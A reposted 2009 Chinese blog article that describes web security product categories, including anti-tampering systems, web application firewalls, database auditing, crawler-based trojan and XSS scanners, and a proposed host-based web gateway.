<p>　　网页防篡改系统可以用于Web服务器，也可以用于中间件服务器，其目的都是保障网页文件的完整性。</p>
<p>　　网页防篡改对保护静态页面有很好的效果，但对于动态页面就没有办法了，因为页面是用户访问时生成的，内容与数据库相关。很多SQL注入就是利用这个漏洞，可以继续入侵Web服务器。</p>
<p>　　到目前为止，很多网页防篡改产品中都提供了一个IPS软件模块，用来阻止来针对Web服务的SQL注入、XML注入攻击。如国内厂家的WebGuard、iGuard、InforGuard等产品。</p>
<p>　　共7页: 123 4567</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>2、Web防火墙产品：</strong></p>
<p>　　防止网页被篡改是被动的，能阻断入侵行为才是主动型的，前边提到的IPS/UTM等产品是安全通用的网关，也有专门针对Web的硬件安全网关，国内的如：绿盟的Web防火墙，启明的WIPS(webIPS)，国外的有imperva的WAF(WebApplication Firewall)等。
<center>
<table cellspacing="4" cellpadding="1" align="center" border="0">
    <tbody>
        <tr>
            <td valign="top" align="center"><strong><img height="338" src="http://img.hexun.com/2009-05-07/117454659.jpg" width="580" border="1"  alt="" /></strong></td>
        </tr>
        <tr>
            <td valign="top" align="center"></td>
        </tr>
    </tbody>
</table>
</center>
<center>图<br />
<br />
</center>　　Web防火墙，主要是对Web特有入侵方式的加强防护，如DDOS防护、SQL注入、XML注入、XSS等。由于是应用层而非网络层的入侵，从技术角度都应该称为WebIPS，而不是Web防火墙。这里之所以叫做Web防火墙，是因为大家比较好理解，业界流行的称呼而已。由于重点是防SQL注入，也有人称为SQL防火墙。
<p>&nbsp;</p>
<p>　　Web防火墙产品部署在Web服务器的前面，串行接入，不仅在硬件性能上要求高，而且不能影响Web服务，所以HA功能、Bypass功能都是必须的，而且还要与负载均衡、WebCache等Web服务器前的常见的产品协调部署。</p>
<p>　　Web防火墙的主要技术的对入侵的检测能力，尤其是对Web服务入侵的检测，不同的厂家技术差别很大，不能以厂家特征库大小来衡量，主要的还是看测试效果，从厂家技术特点来说，有下面几种方式：?</p>
<p>　　代理服务：代理方式本身就是一种安全网关，基于会话的双向代理，中断了用户与服务器的直接连接，适用于各种加密协议，这也是Web的Cache应用中最常用的技术。代理方式防止了入侵者的直接进入，对DDOS攻击可以抑制，对非预料的&#8220;特别&#8221;行为也有所抑制。Netcontinuum(梭子鱼)公司的WAF就是这种技术的代表。?</p>
<p>　　特征识别：识别出入侵者是防护他的前提。特征就是攻击者的&#8220;指纹&#8221;，如缓冲区溢出时的Shellcode，SQL注入中常见的&#8220;真表达(1=1)&#8221;&#8230;应用信息没有&#8220;标准&#8221;，但每个软件、行为都有自己的特有属性，病毒与蠕虫的识别就采用此方式，麻烦的就是每种攻击都自己的特征，数量比较庞大，多了也容易相象，误报的可能性也大。虽然目前恶意代码的特征指数型地增长，安全界声言要淘汰此项技术，但目前应用层的识别还没有特别好的方式。?</p>
<p>　　算法识别：特征识别有缺点，人们在寻求新的方式。对攻击类型进行归类，相同类的特征进行模式化，不再是单个特征的比较，算法识别有些类似模式识别，但对攻击方式依赖性很强，如SQL注入、DDOS、XSS等都开发了相应的识别算法。算法识别是进行语义理解，而不是靠&#8220;长相&#8221;识别。?</p>
<p>　　模式匹配：是IDS中&#8220;古老&#8221;的技术，把攻击行为归纳成一定模式，匹配后能确定是入侵行为，当然模式的定义有很深的学问，各厂家都隐秘为&#8220;专利&#8221;。协议模式是其中简单的，是按标准协议的规程来定义模式；行为模式就复杂一些，</p>
<p>　　Web防火墙最大的挑战是识别率，这并不是一个容易测量的指标，因为漏网进去的入侵者，并非都大肆张扬，比如给网页挂马，你很难察觉进来的是那一个，不知道当然也无法统计。对于已知的攻击方式，可以谈识别率；对未知的攻击方式，你也只好等他自己&#8220;跳&#8221;出来才知道。</p>
<p>　　<strong>&#8220;自学习&#8221;功能的发展：</strong></p>
<p>　　Imperva公司的WAF产品在提供入侵防护的同时，还提供了另外一个安全防护技术，就是对Web应用网页的自动学习功能，由于不同的网站不可能一样，所以网站自身页面的特性没有办法提前定义，所以imperva采用设备自动预学习方式，从而总结出本网站的页面的特点。具体的做法是这样的：</p>
<p>　　通过一段时间的用户访问，WAF记录了常用网页的访问模式，如一个网页中有几个输入点，输入的是什么类型的内容，通常情况的长度是多少&#8230;学习完毕后，定义出一个网页的正常使用模式，当今后有用户突破了这个模式，如一般的帐号输入不应该有特殊字符，而XML注入时需要有&#8220;&lt;&#8221;之类的语言标记，WAF就会根据你预先定义的方式预警或阻断；再如密码长度一般不超过20位，在SQL注入时加入代码会很长，同样突破了网页访问的模式。</p>
<p>　　网页自学习技术，从Web服务自身的业务特定角度入手，不符合我的常规就是异常的，也是入侵检测技术的一种，比起单纯的Web防火墙来，不仅给入侵者&#8220;下通缉令&#8221;，而且建立进入自家的内部&#8220;规矩&#8221;，这一种双向的控制，显然比单向的要好。</p>
<p>　　Citrix公司收购了Teros后，推出的应用防火墙通过分析双向流量来学习Web服务的用户行为模式，建立了若干用户行为模型，一但匹配上你是某个行为，就按该模式行为去衡量你的行为做法，有&#8220;越轨&#8221;企图立即给予阻断。这个自适应学习引擎与Imperva公司的网页自学习有些类似，不过一个重点是学习网页特点，一个是学习用户访问的规律。</p>
<p>　　从安全角度来说，网业自学习技术与入侵防护结合使用，是理想的选择。</p>
<p>　　<strong>Web防火墙的未来出路：</strong></p>
<p>　　有一种说法：因为Web服务器前的负载均衡设备、Web加速设备是不可缺少的，又是Web服务器群的出口必经之路，所以Web防火墙的功能有可能与这些设备合并。这种发展趋势有些象网关UTM与单独的FW、IPS、AV、VPN等设备进化发展一样，UTM就是这些网关的集合产品。</p>
<p>　　但我有一个不同的看法：UTM部署于网络的外连接出口，一般是互联网出口，其网络安全隔离作用，这里的带宽价格昂贵，所以拥有大带宽的用户很有限，而Web服务器群是与网络主交换机连接的，提供的是应用处理能力，要求的参数常是并发用户的数量与在线用户的数量，服务器一般都是千兆接口，目前的交换机就可达到几十个TB的交换能力，在大流量链路上做多功能的安全产品，又是应用层的检测，对产品的硬件压力是巨大的，能达到&#8220;线性&#8221;流量的产品一定价格昂贵，因此Web防火墙的这种合并思路是有待商榷的。</p>
<p>　　共7页: 1234 567</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>3、Web数据库审计产品：</strong></p>
<p>　　有效恢复是安全保障的一个很重要的理念。我们提到动态网页的防护难点是用数据库现场生成的，因此对数据库的修改就变得很关键，Web数据库审计产品的目的就是对数据的所有操作进行记录，当发现问题时，这些操作可以回溯。打个比方，你在游戏中的装备被别人给&#8220;划走&#8221;了，过了一周，你发现了，但一周中，游戏在继续，你的装备有很多新动态，合理与不合理变化交织在一起。此时，若管理人员知道确定是&#8220;某人&#8221;的篡改，就可以把他的动作进行&#8220;逆向&#8221;操作，你的游戏仍可以继续，不受影响；若通过协商，需要恢复到篡改前的某个状态，则在数据库中先取得篡改前最近一次的备份数据，再使用数据库的审计记录，一直&#8220;操作&#8221;到篡改前的状态，游戏就可以继续了。这种技术与数据库的实时同步备份技术是类似的。</p>
<p>　　当然数据库的操作量很大，全部记录需要很大的数据空间，所以，Web服务中重要数据库操作才进行详细审计，审计的目的是为了运营状态的可恢复。常见的Web审计数据：?</p>
<p>　　帐户操作：涉及权限的改变?</p>
<p>　　运营操作：涉及&#8220;财与物&#8221;的变化?</p>
<p>　　维护操作：涉及&#8220;特殊权限&#8221;人的动作</p>
<p>　　Web数据库审计产品一般采用旁路部署，不影响数据库的业务效率。若在业务流量不很大的情况下，可以采用Agent的软件方式，但是不建议完全依靠数据库自身的日志功能，因为，入侵者破坏后一定有&#8220;抹去痕迹&#8221;的步骤，痕迹一般就是系统本身的日志，单独的审计机制保障了日志的完整性。</p>
<p>　　共7页: 12345 6[7]</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>4、Web木马检查工具：</strong></p>
<p>　　Web安全不仅是维护网站自己安全，通过网站入侵用户电脑的危害也十分棘手。网页容易被挂上木马，或被XSS攻击利用，是否有工具可以对所有的网页进行安全检查呢？这里用到了&#8220;爬虫&#8221;技术。</p>
<p>　　&#8220;爬虫&#8221;技术最早是搜索引擎&#8220;发明&#8221;的，搜索网站放出N个小&#8220;爬虫&#8221;，在世界各地的网站上循环扫描，收集网站上的新信息，建立供世界人民查找的数据库，这样大家就可以从Google、百度等搜索门户上搜到你想要的任何东东。由于&#8220;爬虫&#8221;来自网站外部，所以可以模拟用户打开网站的实际效果，所以&#8220;爬虫&#8221;很快被网站用来测试自身性能的&#8220;用户体验&#8221;工具，比如网页打开的速度，用户互动的等待时间等。作为用户体验工具，&#8220;爬虫&#8221;很快也在企业内部网络上开始流行，关注用户感受，是08年开始IT领域内最流行的开发理念。
<center>
<table cellspacing="4" cellpadding="1" align="center" border="0">
    <tbody>
        <tr>
            <td valign="top" align="center"><strong><img height="330" src="http://img.hexun.com/2009-05-07/117454660.jpg" width="580" border="1"  alt="" /></strong></td>
        </tr>
        <tr>
            <td valign="top" align="center"></td>
        </tr>
    </tbody>
</table>
</center>
<center>图<br />
<br />
</center>　　所谓&#8220;爬虫&#8221;就是这样一些进程，按照一定的规则(横向优先搜索、纵向优先搜索)，将网站上所有的页面打开一遍，(你知道很多网站的点击率飞涨的原因了吧，是有无数的小爬虫在工作&#8230;)，在对网页上关心的事情进行检查。由于是以用户的身份&#8220;浏览&#8221;网页，所以没有静态与动态页面的差别。Web木马检查工具就是基于这个原理开发的，不同于搜索爬虫的是，在网页检查时，重点查看网页是否被挂木马，或被XSS利用。因为网站内的URL链接去向应该可追溯的，所以对XSS的检查是很有效的。(&#8220;爬虫&#8221;有些象网页防篡改的文件检查进程是吧，不过一个是在Web服务器的内部，另一个是在web服务器的外部)
<p>&nbsp;</p>
<p>　　Web木马检查工具一般作为安全服务检查使用，也可以单独部署一台服务器，定期对网站检查，发现问题及时报警。该工具目前市场上的产品化很少，一般不销售，网上有些免费的类似软件可以试用，随着Web服务在企业内的应用增多，该工具应该象防病毒检查工具一样流行。</p>
<p>　　共7页: 123456 7</p>
<p>　　内容导航</p>
<p>　　第 1 页：Web架构原理 第 2 页：Web架构中的安全点分析</p>
<p>　　第 3 页：网页防篡改产品 第 4 页：Web防火墙产品</p>
<p>　　第 5 页：Web数据库审计产品 第 6 页：Web木马检查工具</p>
<p>　　第 7 页：新的想法主机Web网关</p>
<p>　　<!--page--> <strong>五、新的想法主机Web网关</strong></p>
<p>　　Web服务是从互联网技术发展起来，互联网是&#8220;草根&#8221;文化的集大成者。在互联网中，共享智慧是追求，简捷实用是方法。</p>
<p>　　很常见的现象，Web服务的处理能力采用集群技术、云计算技术，都是利用物美价廉的PC服务器集成在一起，而不是选用&#8220;庞大&#8221;的巨型机。P2P技术、CDN技术都是网民降低Web服务中心压力，而又能支持大用户、实时流媒体业务的&#8220;互联网Web技术&#8221;。但这也为Web业务的安全防护带来问题网络结构问题。为了提供处理能力，众多的服务器&#8220;网&#8221;一样地接在核心交换机上，在服务器前没有汇聚点，web防火墙的部署就成了问题。</p>
<p>　　草根文化的特点就是系统避免过渡依赖某一个点(大家都是重要的)。Web服务不同于传统银行模式的集中处理，服务器是PCServer组成的群，由于加入与离开群，对群的服务没有影响，只是服务处理能力的动态变化而已，所以服务器群中的每个服务器的处理能力相对不是那么宝贵，某个服务器的异常宕机也只是对个别的用户服务有些&#8220;临时影响&#8221;，在服务器中安装Agent的&#8220;恐惧&#8221;，Web服务管理者应该是没有的。</p>
<p>　　为了与&#8220;群&#8221;或&#8220;云&#8221;等Web新型网状结构相适应，Web服务应用层的防护，可以与网页防篡改合起来(尤其是OS提供底层的文件修改监控)，我们给它一个新的名字主机Web网关(HostWebGateway)。</p>
<p>　　主机Web网关的部署与防篡改产品一样，以Agent的形式嵌入到Web服务器中，不需要再关心Web服务的网络结构，同时，也避免了在Web服务使用加密协议时，网关安全设备对应用层攻击无能为力的弊端。</p>
<p>　　<strong>主机Web网关的主要功能：</strong></p>
<p>　　?</p>
<p>　　Web应用入侵防护(SQL注入、XSS等)?</p>
<p>　　页面文件防篡改? Web网页自动学习功能?</p>
<p>　　Web用户访问行为的自学习功能</p>
<p>　　至于系统级的入侵防护与DDOS防护，放在UTM/IPS中解决，Web服务的网络结构就灵活多了。主机Web网关采用软件形式，没有了串行设备的性能要求，部署的成本也会大大下降。</p>
<img src ="http://www.blogjava.net/xskowscut/aggbug/271231.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.blogjava.net/xskowscut/" target="_blank">xskow!</a> 2009-05-18 09:35 <a href="http://www.blogjava.net/xskowscut/articles/271231.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>